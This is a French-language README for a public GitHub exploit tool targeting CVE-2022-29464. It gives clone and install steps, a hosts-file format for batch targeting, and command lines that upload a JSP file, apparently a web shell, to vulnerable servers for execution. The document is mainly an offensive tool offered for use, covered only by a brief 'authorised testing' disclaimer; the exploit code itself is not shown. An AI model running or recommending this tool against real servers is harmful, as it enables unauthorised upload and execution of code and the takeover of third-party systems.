
Script d'exploitation en Python pour CVE-2022-29464, permettant le téléversement de fichiers vers des serveurs vulnérables. Prend en charge le ciblage unique et le traitement par lots avec des charges utiles JSP personnalisées pour des tests de sécurité autorisés.
Ce dépôt contient un script pour exploiter la vulnérabilité CVE-2022-29464, qui permet de télécharger des fichiers vers des serveurs vulnérables. Utilisez-le uniquement dans des environnements autorisés et à des fins éducatives.
# Clonez le dépôt depuis GitHub
git clone https://github.com/c1ph3rbyt3/CVE-2022-29464.git
cd CVE-2022-29464
pip install -r requirements.txt
Le script propose deux modes principaux :
-f, --file : Spécifie un fichier contenant une liste de cibles.-t, --target : Spécifie une seule cible au format HOST:PORT ou IP:PORT.-j, --jsp_file : Nom du fichier JSP qui sera téléchargé (par exemple, uploader.jsp). Obligatoire.Le fichier d’hôtes doit contenir une liste de cibles au format suivant :
127.0.0.1:8080
example.com:443
192.168.1.1:8443
Chaque ligne doit inclure une adresse IP ou un nom d’hôte suivi du port, séparés par deux-points (:).
uploader.jspLe fichier uploader.jsp inclus dans ce dépôt peut être remplacé par un autre ; celui-ci n’est qu’un fichier de référence. Le fichier du dépôt est téléchargé sur le serveur pour effectuer des tests de chargement et d’exécution.
python CVE-2022-29464.py -t 192.168.1.1:8080 -j uploader.jsp
python CVE-2022-29464.py -f hosts.txt -j uploader.jsp
python CVE-2022-29464.py -h
Créé par : C1ph3rByt3